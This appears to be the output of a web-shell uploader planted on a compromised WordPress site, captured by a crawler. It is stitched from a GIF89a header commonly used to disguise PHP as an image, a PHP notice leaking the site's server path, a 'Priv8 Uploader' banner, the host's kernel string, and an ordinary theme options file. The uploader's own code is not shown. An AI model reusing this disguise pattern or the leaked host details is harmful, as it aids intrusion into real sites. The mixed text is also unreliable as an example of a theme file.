GIF89a;
Notice: Undefined index: in /home/bs3263/domains/poolq.ee/public_html/wp-content/plugins/classic-editor/classic-editor.php on line 3
Priv8 Uploader By InMyMine7
Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
<?php
// Translation Options
$translation = array(
'enabled' => true,
'dir' => TEMPLATEPATH . '/languages'
);
// General Options
$general = array(
'jquery' => true,
'featured_image' => true,
'custom_background' => true,
'clean_exerpts' => true,
'hide_wp_version' => true,
'meta_rss' => true,
'pingback_url' => true,
'automatic_feed' => false
);
// Widgets
$widgets = array(
'banners-125' => '125x125 Banners',
'comments' => 'Comments',
'posts' => 'Posts',
'social-connect' => "Social Connect",
'social-share' => 'Social Share',
'tabs' => 'Tabs',
'tweets' => 'Tweets',
'infobox' => 'Info Box'
);
//Menus
$menus = array(
'menu-primary' => array(
'active' => 'true',
'hook' => 'menu_primary',
'theme_location' => 'primary',
'wrap_class' => 'menu-primary-wrap',
'menu_class' => 'menus menu-primary',
'superfish_class' => 'menu-primary',
'fallback' => 'themater_menu_primary_default',
'depth' => '0',
'effect' => 'fade',
'speed' => '200',
'delay' => '800',
'arrows' => 'true',
'shadows' => ''
),
'menu-secondary' => array(
'active'=> 'true',
'hook' => 'menu_secondary',
'theme_location' => 'secondary',
'wrap_class' => 'menu-secondary-wrap',
'menu_class' => 'menus menu-secondary',
'superfish_class' => 'menu-secondary',
'fallback' => 'themater_menu_secondary_default',
'depth' => '0',
'effect' => 'fade',
'speed' => '200',
'delay' => '800',
'arrows' => 'true',
'shadows' => ''
)
);
?>